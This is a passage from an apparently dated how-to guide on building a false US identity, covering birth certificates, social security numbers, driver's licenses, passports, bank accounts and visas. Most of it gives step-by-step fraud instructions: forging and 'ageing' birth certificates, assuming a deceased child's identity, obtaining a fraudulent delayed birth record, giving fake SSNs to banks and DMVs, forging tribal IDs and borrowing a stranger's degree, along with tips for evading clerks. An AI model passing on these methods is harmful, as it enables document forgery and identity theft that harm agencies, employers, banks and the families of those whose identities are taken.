Again, like at state level, a county level certificate could be old or
new. Old if it was issued shortly after birth, new if it is a recently
requested copy. Recent copies, like at state level, can be poor quality
photocopies or high quality printed versions.
(4) Baptismal certificate. Not an actual birth certificate, but often
accepted as such by the authorities in the absence of any other form of
birth certificate (which is not uncommon). To be acceptable as valid it
must contain the location and date of the birth, the location and name of
the church, the date of baptism, the names of the parents, the signature
and stamp or seal of a church official, and the baptism must have taken
place within a few months of the child's birth.
Any adult's baptismal certificate will be quite old. Similar to hospital
certificates, no new copies of old certificates are ever issued because
there is no reason why anyone should ever require a copy of their
baptismal certificate.
Again, like hospital certificates, the baptismal certificate is often
faked because it is very difficult to disprove its validity, particularly
if it has been "aged" to look old.
(b) Requesting a copy of a birth certificate
How easy is it? It varies from state to state, county to county.
Theoretically, birth, death, marriage records, etc should be available to
the public, however this is no longer always the case. The authorities,
alarmed by the number of people accessing records with criminal intent
(eg for welfare fraud, particularly in large cities like Los Angeles) are
making access to records more difficult.
When applying for a copy of a birth certificate the office may stipulate
that it will only supply a copy to the actual person themselves, or to an
immediate relative, verified by supplying a photocopy of a drivers license
(this is where a fake license can come in useful).
Where and how do I apply for a copy of a certificate?
You can either apply at state level or county level. Its probably a good
idea to apply at both levels because you won't know how long it's going
to take and whether your application will run into any difficulties.
Generally its easier to deal at county level - they tend to be a little more
informal.
You'll have to mail in a request form, together with a small fee. Very
often you can download and print off a copy of the form because many
statistics and record offices have web sites. Sometimes you can get away
with just sending a letter and the correct fee to a county office (like I
said, they tend to be more informal) which is good because it means you
don't have to give as much information.
They will want to know why you are requesting a copy of a birth
certificate. Common reasons are for legal cases, genealogy, or to be
submitted to the government as part of your security clearance for a new
job. Your only problem here is that unless your request appears urgent
you may find you have to wait a long time (weeks or even months) for
your copy.
If you are in a hurry, some offices offer a speedier service with delivery
by courier for an additional payment.
(c) Does everyone have a birth certificate? Surprisingly, some people
have no birth certificate at all, because their birth was never officially
recorded by the state. Parents with strong religious beliefs frequently did
not record births, or as mentioned, when children were born outside of a
hospital the doctor or midwife would have issued a certificate (see
"Hospital birth certificate") but the birth was not recorded at county or
state level, plus the certificate issued by the doctor or midwife may have
been lost leaving no record at all of the birth.
(d) How can an authentic birth certificate be created for my new identity?
Now we know a little of how the system works, let's look at some
different methods:
(1) Producing a fake birth certificate.
(2) Borrowing the identity of a deceased child.
(3) Delayed record of birth - convincing the administration that your
birth was never officially recorded.
(1) Producing a fake birth certificate
Creating a completely new identity using new details (so you get to
choose your own name, date of birth, etc). This process involves getting
hold of some authentic birth certificates (so that you have a basis to work
from) and using the desktop publishing facility on a computer, producing
a fake certificate with your own details.
Firstly you need to decide the type of certificate to reproduce. We
know there are basically four types of certificate (see (A)(a) "What kind
of certificates are there?") - hospital, state, county and baptismal. I would
have reservations about reproducing a state certificate - physically, it's no
more difficult to reproduce than any of the others, but a drawback is that
you are not going to be able to put a state birth number on it which is
going to be 100% verifiable, although as previously mentioned, this is
not necessarily a major problem - government departments do not
automatically verify documents sent to them as proof of ID unless there
is something about the document that leads them to suspect that it may be
a fake. However, if you do want to reproduce an actual state certificate, I
recommend that you get an actual copy of a birth certificate from that
state and change all the names and family details etc, but retain the state
birth number, sex, the county of birth and also the date of birth. This is
because it seems likely that in many states, the number on the certificate
is coded to include a reference to these indicators, so changing any of
them is likely to question the authenticity of the certificate.
A county birth certificate is a more feasible alternative. They differ
greatly in appearance from one county to another, and though it will have
a birth number on it, this is issued locally by the county records office
and is therefore more difficult for the administration to verify (they
would have to go to the trouble of actually contacting the records office).
Another bonus is that it is easier to get hold of copies of county issued
birth certificates (they are generally more obliging in supplying them -
see (A)(b) Requesting a copy of a birth certificate).
The actual process of reproducing a county certificate is not difficult.
Decide where you would like to be "born" (remember it's usually
preferable to have a birth certificate from a different location from where
you intend to settle so that when you need to produce your certificate as
ID, local clerks won't be familiar with the appearance of it). You will
then need to visit the area to look in some old editions of the local
newspaper in the town library to pick out a name or names in the "birth"
column. Anyone will do, just as long as the period is correct (eg 40 years
ago if you are 40 years of age) - take as many details as possible (location
of birth, date, parents names, etc). You need enough information to enable
you to write off to the records office to request a copy of the certificate.
Once you have a copy you can then get to work to reproduce it and
create your own fake certificate with your details on it. Scan it into a
computer and remove the details of the actual person, and insert your
own details. You may have to purchase the correct type of paper from a
specialist stationary store. The trickiest part is reproducing the
certification stamp and seal (this is where the paper has been squeezed in
a small vice-like instrument to produce a raised area of paper like a large
coin). Examine the seal on the original copy - it probably won't be very
clear, but it will probably have the seal of the county or city encircled
by some lettering saying "City of Dudesville" or "Dude County Recorder's
Office", etc. Fake certificates ordered from fake ID companies will
generally have some kind of seal on them, but often it's not appropriate
to the document and may be easily seen as a fake by a clerk examining it.
The good news is that it is possible to purchase seals from office supply
companies (they are needed for legitimate reasons by notaries,
corporations, etc) and also from some mail order ID companies, although
you may have difficulty in getting one with the correct wording around it
(it's illegal to reproduce the seals of actual agencies). Finally, of course,
it doesn't matter that your certificate looks new because it's supposed to be
a newly certified copy of your original certificate (which has got lost).
A hospital birth certificate is definitely worthy of consideration. As
mentioned, these are accepted by the administration as being valid and
they have the advantage of being difficult (or impossible if the hospital
has since closed down) to verify or disprove. The method of reproducing
one would be similar as described above for a county certificate (with the
exception that the document would have to be "aged" to make it look
old). The only real difficulty here lies in getting hold of an old certificate
to see what one actually looks like - it is not possible to order a copy in
the same way as it is with county and state certificates. This is where
I suggest you may have to become interested in genealogy (researching
your ancestors). This gives you a legitimate reason to be interested in birth
certificates - there are numerous clubs, books, societies, and web sites.
After a few days research you should be more knowledgeable on the subject.
A baptismal certificate is probably a less satisfactory option because
it is not as "official" as a hospital certificate and may not be so readily
recognized as ID by the administration. However, it does have the
advantage of being easily reproduced because it is possible to buy blank
certificates from clerical supply stores. Again, like the hospital
certificate, it would need to be "aged". This is not difficult. Some people
stain them with tea to give a brown appearance, although this isn't always
a good idea because it may make the document smell and sometimes clerks are
wise to this. It's probably just as easy to leave it out in the sun
to give it a faded appearance, and the fold it up and put it in a shoe you
are wearing. This will give it a nice soft, folded feel, with worn edges.
(2) Borrowing the identity of a deceased child
This is a clever idea borrowed from a work of fiction ("The Day of the
Jackal" by Frederick Forsyth). The basic concept is very simple - you
search newspaper news or obituary columns (or cemeteries) to locate a
child who was born about the same time as yourself, but who
unfortunately died young. The child's birth would have been officially
recorded and a birth certificate issued, but then nothing. At the time of
the child's death a death certificate would have been issued, but it is only
in recent times that any form of cross-referencing has taken place with
birth and death records (eg since 1979 in Wisconsin, cross-referencing
has taken place so that birth certificates from 1979 onwards are marked
"deceased" if the person dies). So what we have with a deceased child is
a completely virgin, unused, verifiable identity.
The concept is to locate a suitable child, request a copy of his/hers
birth certificate, and then you become that person. The only proviso
being that its probably better to choose a child from a different state in
which you intend to settle to make it less likely that you'll ever run into
anyone from the deceased's family (because remember you'll have the
same name and birth day as the deceased).
Foolproof, eh? Not quite. There's a very obvious problem. How do you
know that someone else before you hasn't had the same idea and already
used the identity? The first you'll know about it is when you have the
police or FBI knocking on your door, wanting to know why you are
requesting a drivers license or social security number for someone that's
already got one. Now you could think to yourself, I'll do some research
on an identity before I go ahead and use it. You could check phone
listings across the country or get a private detective or information broker
to check if anyone is using a particular name (they can get access to
social security, drivers license records, etc that the general public can't).
They may come back to you and say that there appears to be no one in
the US with that name and date of birth, so you could think to yourself
that it's safe to go ahead and use the identity. But wait a minute - the
really scary thing is that someone may use the same identity in the future!
You've got no control over that and you'll have no warning if it happens!
This method will ultimately disappear in time anyway. The IRS has
recently commenced a policy of issuing social security numbers to
infants (its actually connected with their parents being able to claim tax
credits) - this means that should the child subsequently die this will be
entered in the social security death index. Anyone subsequently trying to
use that identity would therefore find it impossible to get a social security
number, thus making it very difficult for anyone trying to live a normal
life in the US.
(3) Delayed record of birth
This is an interesting idea which, although it may require a
considerable amount of research and preparation, could produce
worthwhile results.
The concept here is that you provide the administration with enough
evidence to convince them that your birth wasn't officially recorded at
the time (not uncommon, see (A)(c) Does everyone have a birth
certificate?).
The procedure is as follows. First, find a couple that were married but
are now deceased. Do this by looking at family graves in cemeteries, and
when you find a couple who could conceivably have been the right age to
have been your parents, find any information you can from the cemetery
office (family details, wife's maiden name, and where they died, etc).
With this information you can always go to the nearest library and look
in the obituary columns for additional information.
With this knowledge you can now contact the records office for the
state or county where your "parents" lived, requesting a copy of your
birth certificate, supplying your "parents" surname, plus any first names
you have chosen and a new birthday (if you think at any stage people
might come looking for you its probably wise not to use your actual
birthday).
They will of course write back informing you that there is no record of
your birth, but they should also enclose an application for a "delayed
record of birth". Together with your completed application form, you will
be expected to provide some proof of your identity in the form of
documentation. This proof will vary from state to state or county to
county. This is where your research and preparation is needed. You will
have to previously have organized some proofs of ID, eg using a fake
birth certificate in your new name to get a real drivers license or state ID
card, etc.
If all goes well you should be supplied with a copy of your birth
certificate, and more importantly, your "birth" will be officially recorded
and verifiable, with no danger that it can be challenged at any time in the
future.
Conclusion. You've read these different methods, so which do you
think are the best options? It probably depends on what you require the
new ID actually for. Basically, the more verifiable the birth certificate,
the more doors it will open for you. If you are thinking of getting a social
security number (which you will almost certainly need if you intend to
live permanently in the US under the new identity, unless you intend to
permanently exist in the black economy and not even have a bank
account) or a passport, you can forget about using a poor quality fake or a
baptismal certificate. In brief, a delayed issued birth certificate is the
best, but it also requires the most work. Second best is probably a
hospital birth certificate - it isn't actually verifiable, but on the other
hand it's virtually impossible to disprove and is generally accepted by the
administration. Finally, a fake copy of a county certificate may suffice if
it looks authentic and is always presented with other supporting
documentation, the only disadvantage being it is potentially not verifiable
if a clerk decides to check by contacting the county records office. We'll
cover the requirements in the next sections for drivers licenses and social
security numbers, which should be the next documents you acquire.
(B) Social Security Number
(a) Do I need one?
(b) How do I get one?
(a) Do I need a social security number?
Getting a social security card will not be easy, even if you have a
verifiable birth certificate. But if you intend to live permanently in the
US it's really a necessity - you need to give your employer your number,
a bank will request your number when you try to open an account, utility
companies will request the number if you require their services, since
1996 applicants for professional licenses, commercial drivers licenses,
occupational licenses and marriage licenses are required to give their
number, and so on. Most states now require your number before issuing a
drivers license (except for people who genuinely haven't got a number
and aren't entitled to one, eg people not authorized to work in the US).
The social security number has become a standard means of tracing
people used by both government and private organizations.
You hear of people buying fake social security cards, but this isn't
a long term viable option - give a false number to your employer and the
government computer will spit it back out within a few weeks. Since
September 11th, businesses that employ large numbers of immigrant
workers are stepping up efforts to identify and dismiss employees
without proper work documentation. Currently, out of the six and a half
million businesses that report to the Social Security Administration, the
SSA sends out about 110,000 notices a year to workers with incorrect
SSN's. Giving a false number to a bank (to open a bank account) doesn't
currently appear to be a problem. If you look at cases of identity theft,
in many cases the fraudsters open accounts in the names of legitimate
people, but give phony SSN's.
Life without a valid number is only really possible if you have
independent means (maybe in off-shore accounts) or you work in the
black economy, or maybe you're not a US citizen and you need to spend
more time in the US than your visitors visa would allow.
(b) How do I get a social security number?
This is the tricky part. The easiest way to apply is by post - you just
send in the appropriate form with whatever proof of ID they request, and
you get back in the post your social security number. The difficulty is
that this method is only open to children and teenagers - anyone over the
age of eighteen has to apply in person. But don't completely rule out this
method - apparently it is feasible to apply as a child by sending in an
altered version of your birth certificate, changing your birthday, the ages
of your "parents", etc. You will receive back a social security number,
the only drawback being that your age will be wrong on the system. This
is not an immediate problem because your age or date of birth does not
appear on your social security card, but it will mean you will not be able
to work until the system believes you have reached working age - the
administration will not be expecting tax returns from fourteen year olds.
If you intend to take the other route and apply as an adult you will
need a convincing story why you do not already have a number. Your
options are rather limited - you can always say you have lived abroad
since leaving college, or been in a mental asylum! You'll have to give
some thought to this. The clerk interviewing you is naturally going to be
suspicious of maybe someone in their thirties or forties claiming never to
have had a social security number.
However, before you become too disheartened remember that over
five million numbers are issued every year, that's a hundred thousand a
week! The administration isn't going to spend hours researching your
application. A recent audit of SSN applications noted that out of 3,557
applications, 999 of them had submitted "improper documentation" and
yet still been approved for SSN's. Again it's all down to preparation and
research.
Plus, it is also worth noting that at the moment there is no link between
the Social Security Administration and the Immigration and Naturalization
Service to check the validity of immigration documentation or visas that are
submitted by non-citizens with their applications.
Do it right and you should get through. Its worth visiting the Social
Security Administrations site on the web (see "Links" at the very end) -
there's a wealth of information here, also including an explanation of how
the nine digit number is made up (the number contains information
showing when and where it was issued - basically the first 3 digits
indicate where the number was issued, the next 2 digits when issued, and
the last 4 digits are issued consecutively).
(C) Drivers License
A drivers license is really essential - it's the standard form of photo
ID. For example, some hotels and motels won't now accept a credit card
unless it's backed up by a photo ID. For everyday purposes like this a
fake license would suffice, particularly from a state different to the one
you're living in (all states issue their own license and they all differ in
appearance).
If you intend to drive you need a drivers license. But if you get
stopped by the police and you show them a fake license, no matter how
authentic it looks they will verify it on-line and you will be in big
trouble.
So, how do you get a drivers license? You will need to apply in the
state in which you are resident, and as well as taking a driving test you
will need to supply them with a whole load of information, the point
being the license is regarded as being a proof of ID. The motor vehicle
department in most states contains the following information:
- Full name
- Date of birth
- Home address
- Telephone number
- Marital status
- Height and weight
- Eye and hair color
- Medical data
- Social security number (now required by most states)
Plus, your file will also contain details of the documents used to apply for
the license
It used to be possible to get a real drivers license by taking in a fake
license from another state, and asking to exchange it for one from that
state. However, a recent development is the NDR (National Drivers
Register) - states can now do an on-line check to verify a license, the
purpose being to stop drivers who have had their license suspended in
one state applying for a license in another state. But if you've got a
birth certificate and some supporting documentation, there is no reason
why you should not get a drivers license. The documentation you need to
supply will vary from state to state, and you may need to supply some
secondary documentation (see the next section "Secondary
Identification"), but this should not be a problem, and maybe a proof of
residency (for example a utility bill or letter from the IRS or your bank).
What if you haven't got a social security number? This isn't an
insoluble problem. You may be able to get away with giving them a fake
number, dependent on which state you are in. Currently fifteen states do
instant on-line verification, so they will check your number whilst you're
actually at the DMV office applying for your license. Thirty-two states
do not check at all. California checks in batches (it's cheaper that way) so
you'll get a temporary license in California if you give an incorrect social
security number, but you'll never get your permanent license.
Check out this website -it's got some very interesting info on the
information different states require when issuing drivers licenses,
although I would recommend you check any of this information to see
whether or not it's still current.
www.networkusa.org/fingerprint/page4/fp-04-page4-winners-losers.html
As mentioned in the section on social security numbers, it is actually
possible in some states to get a drivers license without having a social
security number - if a drivers license applicant does not have an SSN, in
Florida for example, he will be referred to the local Social Security
Administration Office where he will be assessed. If the applicant does
not meet the requirements to be issued with a SSN (eg not authorized to
work in the US), then he will be issued with a notice explaining this,
which the DMV will accept as proof that the applicant does not have or
require a SSN.
After September 11th, there was controversy about the practice of the
four states of Tennessee, North Carolina, Utah and Virginia in issuing
drivers licenses to illegal aliens. They were issuing licenses to people
without SSN's and proper documentation (often accepting almost
anything as proof of residence). The theory behind this was that these
states didn't want thousands of untested, uninsured and unlicensed drivers
on their roads. They knew it was a controversial move, because giving
licenses to illegal immigrants was giving them valid US ID. Since
September 11th there has been some tightening up of requirements to
obtain a license. It's probably worth visiting the websites of these four
states to see what their current requirements are for issuing a license:
Utah - www.driverlicense.utah.gov If you have no SSN they will accept
an ITIN - this is an "Individual Taxpayer Identification Number" issued
by the IRS.
North Carolina - www.dmv.dot.state.nc.us/driverlicense/ Same as Utah
now - no SSN means you'll need an ITIN. When it became known that
the state was issuing licenses to illegal aliens, it was flooded with
applicants. According to the DMV, an estimated 400,000 licenses have
been issued by the state since 1997 to people without an SSN.
Virginia - www.dmv.state.va.us If you do not have an SSN (or you do
not wish your SSN to be displayed on you license) Virginia will issue an
alternative number.
Tennessee - www.state.tn.us/safety/listinfo.htm and see also page for
SSN rules www.state.tn.us/safety/dl/ssn.htm You need to sign an
affidavit to confirm that you've never had an SSN.
In addition, it's also worth checking out the current ID requirements
for the more rural states with smaller populations. These states are going
to have the least problems with illegal immigrants, crime, identity thefts,
etc, so that they will have the fewest measures implemented to deal with
them. Also it must be remembered that they don't want to bring in new
security measures unless they have to because it costs money, which has
to come out of their existing budgets.
Because the laws of each state change all the time, your only really
safe course of action is to visit the DMV web sites of the various states
you are considering applying for a license in. The web sites will have an
up to date list of their current ID requirements. Finally, when you go
for your license the clerks have a habit of taking all your paperwork from
you then casually asking you questions about it so ensure that you know
all your details, e.g. date of birth. Also, they may well be curious why if
maybe you're in your thirties or forties and you haven't already got a
drivers license. So, it's wise to have a ready explanation - maybe you've
lived in Canada for the last twenty years.
I haven't mentioned it before so I'll mention it here. When you're
attending any face-to-face interviews, always go respectably dressed.
Also try and go at a busy time (e.g. lunchtime) so that they won't be able
to spend too long with you. It's also wise not to carry anything that shows
your real identity, just in case they start to get suspicious and try to
detain you (these places usually have security guards).
(D). Passport
This is really the final document in the chain of documents you can
get. You may not necessarily need a passport - if you don't intend
travelling outside the US, Canada or Mexico, you won't need one.
If you do need a passport, then you need a real one - forget about
fakes. When travelling through US customs your passport will be
scanned by computers to verify it.
Like with drivers licenses and social security numbers, thousands of
applications are processed every week, so unless you do anything stupid
and draw attention to yourself, your application should proceed
smoothly.
You can either apply at a post office or local courthouse, or at a
passport office in a large city. It may be best to avoid applying in cities
like New York and Los Angeles because they have a high incidence of
fraudulent applications and so are more vigilant in looking for them.
The good thing about applying at a local post office or courthouse is
that they keep your birth certificate for verification by the State
Department and will reply by post to your mail drop, enclosing
(hopefully) your birth certificate and new passport - but if it goes wrong,
at least they can't trace you any further than the mail box. The bad thing
about this method is that your birth certificate is likely to be more closely
scrutinized because it will be looked at by people who are used to
examining them and are more likely to spot a fake.
Applying in person at a passport office may seem like going into the
lion's den, but it may be worth considering. They will not keep your birth
certificate for verification, it will be looked at there and then, and
presuming all is well your passport will follow shortly after in the post.
The very fact that they don't keep your birth certificate shows that they
don't actually crosscheck it with the actual records office in the state or
county where it was issued. However, it does appear that they can do
some sort of simple verification on the actual state birth number on state
issued birth certificates (see (A)(d)(1) "Producing a fake birth
certificate"). How they verify county issued certificates with locally
issued numbers, or hospital certificates is open to question. Presumably,
it depends on the amount of supporting documentation, the actual
appearance of the birth certificate (whether it looks authentic or not) and
the demeanor/appearance of the applicant.
Looking at it logically, they aren't going to verify every birth
certificate at source. It just wouldn't be possible- the issuing of birth
certificates is too decentralized, and trying to verify them would create
an enormous backlog in the system.
Of course, you will have none of these worries about your birth
certificate if it's a real one procured by the delayed record of birth
method (see (A)(d)(3) Delayed record of birth). Providing your
supporting documentation is adequate, getting a passport should be easy.
The only proviso with all of this is that it might look strange if all
your supporting documentation is all recently issued - the clerk dealing with
you might find this suspicious.
SECONDARY IDENTIFICATION (USA)
1. State ID card.
2. Library card.
3. Miscellaneous ID.
1. State ID Card
This is a form of photo ID carried by people who don't have a drivers
license (maybe they are elderly and don't drive, or maybe there are
medical reasons for them not driving). If you haven't yet got a drivers
license this is a useful thing to have because it has as the same official
status as a drivers license, but is usually easier to get.
They are usually available via the county courthouse and take two
weeks to come through. Because the clerks (unlike at the drivers license
bureau) aren't having to look for suspended drivers trying to get a license
in another state, they are usually less rigorous.
2. Library Card
Not a photo ID, but still useful to have. Most libraries request two
forms of ID. Usually one can be your birth certificate, and the other one
may be something simple like letters addressed to you. Again, this
usually takes two weeks to come through.
3. Miscellaneous
You can always enroll yourself on a short course at a local college and
get yourself a student card. You can print yourself some business cards
on your computer - as for an address and phone number on your cards,
see "Establishing a Mailing Address". You can order yourself a fake
employee ID card from a mail order ID company. Voter registration
cards are often not difficult to get - clerks will often give you a blank one
to fill out, and you just need to stamp it to make it look official (you can
order stamps from mail-order ID companies or from office equipment
suppliers). Or what about Native American tribal ID? You don't have to
look like a tribal member (you are often entitled to this status even if you
only have a single great grand-parent who was a native). These native
ID's are usually very unsophisticated in appearance, and not difficult to
reproduce on a computer. Plus, they have the great advantage of being
very difficult to verify (particularly from a distant state) and clerks do
not like to question them for fear of being accused of racism. You can join
clubs, societies or unions and get their membership cards.
The basic rules with any of theses secondary ID's is that they add to
the credibility of your new identity, particularly when used selectively.
What I mean is always try to use them in situations where they cannot be
verified. Never use a fake document in any dealings with the actual
agency that is supposed to have issued it - always use it with other
agencies, preferably in other states.
Bank Accounts and Credit Cards
Before opening an account, most banks check the name, address and
SSN with a company called ChexSystem. This company has a database
of people whose accounts have been terminated for fraud or chronic
insufficient funds during the past five years.
ChexSystems are covered by the Fair Credit Reporting Act, and the
bank is required to let you know if it refuses to open an account for you
and a report from ChexSystems was a factor.
You will need some basic identification to open an account - social
security number, state ID card or drivers license, etc (banks are very
aware of fraudsters, money launderers, etc, so they like to satisfy them
about your identity). You may get away with giving them a fake social
security number as long as no one else is using that number (they will
check you nationwide with a credit reference bureau), although you could
of course run into problems in the future if the real owner of that number
tries to open an account in the future. Be aware also when giving fake
numbers that computer programs exist to verify whether or not a number
could have been potentially issued (numbers aren't randomly issued, they
come from specific batches for each state).
If providing a social security number is going to cause you a problem,
why not open an account as a foreigner, e.g. a Canadian. Tell them you
have just arrived in the states to work or study. They will still need some
ID from you, but it shouldn't be beyond your ability to come up with
some fake Canadian ID, which of course the bank won't be able to verify
or disprove because it's from another country.
Regarding credit cards, if you have a new identity, you won't have any
credit history so you won't be able to apply for a conventional credit card.
However, a recent innovation is the secured credit card - this is a Visa or
MasterCard, where your credit limit is secured by a deposit you must
maintain in your bank account.
The deposit can be anything from a few hundred dollars to several
thousand if you want a gold card. Once the card is issued to you, you can
spend anything up to the agreed amount - there is no risk to the bank
because you are only spending your own money. The amount of the
security deposit normally varies between 125% and 150% of the credit
line requested. Make sure that you compare the annual fees and fees for
cash withdrawals, etc - unfortunately, these cards usually have higher
costs involved than a normal unsecured card.
There are numerous such cards on offer in the US, normally however
with the stipulation that you must be a US resident and have a SSN
number (this is for cards offered by US financial institutions). If you
want a card without any such requirements, go for an offshore card. It
will still be a US dollar card, but from a bank in a tax haven. They
require the minimum personal information from you.
You can do a search on the net for them, but be careful not to be taken
in by any scam sites. There are web sites that appear to offer off-shore
cards but in reality they are just multi-level marketing scams - send in
$200 to join the scheme, then recruit others who also pay $200, some of
which money goes into your account, and when you reach $1000 in the
account you will be issued with your credit card... except of course you
never get a card because it's a scam.
There are a couple of cards that I've come across that appear to be okay:
www.axxess-international.com
www.horizoncard.tc
CHANGING YOUR NAME (USA)
It may be that you have created a new identity, but it isn't in the name
you ultimately wish to use. The answer is to change your name - it's legal
and it's not difficult. There are two ways to do it: The Common Law
method. This doesn't actually involve any legal process. You simply need
to provide proof that you are generally known by a name other than your
legal name, the proof being such commonplace things as correspondence,
invoices, etc.
The Court method. By filing a petition with a court to change your name.
There are good and bad points to each method. The court method
creates a cast iron identity, easily verifiable. However, it does create a
trail, which could be followed if you are being pursued. You don't have
to do the name change in the state in which you intend to settle, in fact it
may be preferable to do it in another state if you don't want to draw any
attention to yourself (although you will need to show proof that you are
actually resident in that state, which may involve renting a cheap room
there).
Once your new name is legal, you can then proceed to have your
existing documentation amended (drivers license, social security card,
etc).
Whilst on the subject of names, it may be worthwhile here mentioning
something to give you a little food for thought. If you are trying to escape
an old life and wish to create a new identity, you will probably have to
think about getting a job and earning a living. How are you going to do
this? Won't you need qualifications? Why not give yourself some
qualifications? You could of course buy yourself a fake diploma, but it's
not verifiable if an employer ever tries to check it out. What you really
need is a proper college degree. Easy! Colleges and universities keep
records open to the public of who graduated, and when they graduated
and with what degree. Just choose a suitable person with a commonplace
name and borrow their name and degree. I am not suggesting you borrow
their whole identity - you'll have a different birth date, social security
number and so on, but you will have a verifiable educational history. You
aren't running much of a risk - thousands of people in the US share the
same names, and some of those with the same names will have similar
college degrees.
CAN I BE TRACED IN MY NEW IDENTITY? (USA)
What information do employers require from me?
Under the Employer Sanctions law, employers are required to check
the documents of all workers that are hired, to confirm both the identity
of the employee and that also he is entitled to work. Documents that
prove both identity and entitlement to work are:
List A
1. US passport
2. Green card (INS Form I-551)
3. Unexpired Employment Authorization Card (INS Form I-688A)
4. Unexpired Employment Authorization Document with photograph
(INS Form I-688B)
5. Unexpired Temporary Resident Card (INS Form I-688)
6. Unexpired Reentry Permit (INS Form I-327)
7. Unexpired Refugee Travel Document (INS Form I-571)
Documents that only prove identity are:
List B
1. ID card (can be state, federal or local government)
2. Drivers license
3. Voters registration card
4. School ID card with a photograph
5. Canadian drivers license
6. Native American tribal document
7. US military card or draft record
8. Military dependents ID card
9. US coastguard merchant mariner card
Documents that only prove authority to work are:
List C
1. US social security card (does not include cards that state on them "Not
for employment purposes")
2. US citizen ID card (INS Form I-97)
3. ID card for use of Resident Citizen in the United States (INS Form I-179)
4. Unexpired Employment Authorization document issued by the INS
other than those mentioned in the list A
5. Native American tribal document (yes I know this is on both B and C
lists, but not on list A which seems peculiar - don't worry about it)
Documents that can't be used as proof of identity and authorization to
work include, surprisingly:
1. US birth certificate
2. Certificate of US citizenship (INS Form N-560 or 561)
3. Certificate of US Naturalization (INS Form N-550 or 570)
Both employee and employer must complete and sign Form I-9, the
employee signing that he is authorized to work, and the employer signing
to confirm that he has made efforts to establish the employee is
authorized to work, although there is no actual requirement for the
employer to do any checks to confirm the legitimacy of any documents.
For an employer to verify a social security number, he can call a toll free
number (1-800-772-6270) and quote the following info:
1. Social security number
2. Last name
3. First name and middle initial
4. Date of birth
5. Sex
The employer is not obliged to verify numbers - this is simply a service
offered in case there is any doubt over whether or not a number is
correct.
Can anyone else trace me?
If you are concerned that people from your "past" life may be looking
for you, it pays to take some simple but obvious precautions. Firstly,
don't have any financial transactions linking you and your old life. Don't
transfer money between bank accounts because a record is kept, don't pay
for things in your new life with credit cards from your old life because it
may give an indication of where you are and what you're doing.
Secondly, consider your lifestyle - people tend to be creatures of habit.
Do you always drive BMW's, or subscribe to particular trade magazines,
go to a particular church. If a private detective is looking for you they
will find out these sorts of things and use their skills to get information
out of any organizations or businesses you may have had contact with.
Thirdly, be careful who you talk to about your plans - have you ever
mentioned to people that you'd like to live in Florida? It might be better
to go somewhere where people wouldn't expect you to go. Plus of course,
it's probably a good idea only to phone anyone from your old life from
payphones in random locations, just in case anyone is monitoring their
phone records.
GENERAL VISA INFORMATION (USA)
If you're reading this in another country and wondering if you can use
any of the information you have read so far, it may be useful for you to
have some background information about how, as a foreign citizen, you
can legally get into the US, and live and work there. This can be sub-
divided into two categories:
(A). Entry into the US as an immigrant
(B). Entry into the US as a non-immigrant
(A). Entry into the US as an immigrant
For any kind of permanent residence (compared to a temporary entry
visa), you need an immigrant visa, usually called a Green Card. There are
many actual categories in which you may qualify for a green card, but
they can be summarized as the following:
1. Family based. Being an immediate relative of a US citizen or
permanent resident (this category includes children, parents, husbands,
wives, brothers and sisters).
2. Employment based. Covers a wide variety of different areas,
particularly including skilled or highly qualified workers (usually where
it can be proved that no US citizen is available to do the job) and
investors (people willing to bring in and invest hundreds of thousands of
dollars in the US).
3. Visa lottery. Every year 50,000 or 55,000 green cards are given out in
a visa lottery by the US Dept of State (entry to the lottery is not open to
everyone - generally speaking it's only open to citizens of under-
developed countries, not countries like Britain or Germany, etc).
4. Asylum/refugee status. For people with well founded fears of being
persecuted in their own country for reasons of religion, race, politics, etc.
You become a US citizen by a process of naturalization, a process
administered by the INS (the Immigration and Naturalization Service).
Theoretically, when you become a US citizen you are supposed to
renounce any other citizenships (meaning you won't have dual
nationality). In practice, however, firstly the administration won't know if
you retain any other citizenship, and secondly, not all countries recognize
you renouncing their citizenship (so you retain it anyway).
(B) Entry into the US as a non-immigrant
This type of visa does not allow permanent entry to the US. It is what
most people entering the US enter with, and it allows them entry for any
period from a few hours to several years for vacations, business
meetings, study, temporary work, etc, depending on the type of visa
issued.
The usual method of obtaining a visa is by applying to a US consulate
in your own country. Sometimes you are allowed to mail in an
application, although usually you will be asked to attend an interview, the
purpose of which is to filter out undesirables or people who might
overstay their visa in order to illegally live and work in the US.
The exception to this method of obtaining a visa is for citizens of those
countries (certain developed countries) which the US has a visa waiver
program with. As a business or pleasure visitor, you will be allowed
entry into the US for up to 90 days on production of your passport at a
US border. This method of entry is still dependent on them being
satisfied with your reasons for travelling - you must still have a residence
abroad that you have not abandoned, generally a return ticket to get you
out of the US, and means to support yourself whilst in the US. Again, it's
to stop people over-staying their visas and living and working in the US.
If you're from a visa waiver country, don't get paranoid about this. If
you arrive on a regular flight and of normal appearance, you'll be asked
the reason for your visit and maybe how long you're staying, and that will
be it. Your passport will be stamped and you're in. You're likely to get
more questions if you're crossing at land borders - not so if you're with
your family in a nice rental car crossing from Canada into the US and
you're heading for a few days vacation at a resort, but you'll get grief if
you're alone, poorly dressed, with hardly any money and no return ticket
to your country of origin.
Here's the list of non-immigrant visas. It's surprising how many types
there are:
A-1, 2. and 3. For ambassadors, government officials/employees and
associates.
B-1. Temporary visitor for business
B-2. Temporary visitor for pleasure
C-1, 2 and D-1, 2. Transit visas for travelers transiting via the US
E-1, 2. For investors and workers of certain countries that have treaties
with the US
F-1. Students
G-1, 2, 3, 4. For workers in international organizations (eg, the UN)
H-2A, 2B, 3, 4. For temporary and trainee workers, and spouse and
dependents
I. International journalist
J-1, 2. Exchange visitors (usually students and researchers) and their
spouse and dependents
K-1, 2. For someone entering the US to marry a US citizen. Although
this is a non-immigrant visa you will be interviewed and assessed as
though it were for an immigrant visa (to verify both whether your
relationship is authentic and whether you will become a "public charge",
e.g. a criminal or dependent on welfare)
L-1, 2. Intra-company employees and their spouse and dependents (for
employees of large international companies)
M-1, 2. Technical or vocational school students, and their spouse and
dependents
N-1. The parent of certain unmarried minors who are special immigrants
N-2. The unmarried minor child of an N-1 and the unmarried minor
child of certain special immigrants
NATO-1 to 7. For NATO staff, their spouses and dependents
O-1, 2 and P-1, 2, 3 and 4. For highly talented or internationally
recognized athletes, artists, business people, with their spouses and
dependents.
Q-1, 2. Cultural exchange visitors, their spouses and dependents to come
to the US for up to 15 months
Q (ii). Irish peace process - for people from Northern Ireland to
participate in training courses and programs, etc
R-1, 2. For religious workers, their spouses and dependents
S-1, 2. For criminal informants, their spouses and dependents
TN. For NAFTA (North American Free Trade Agreement) professionals
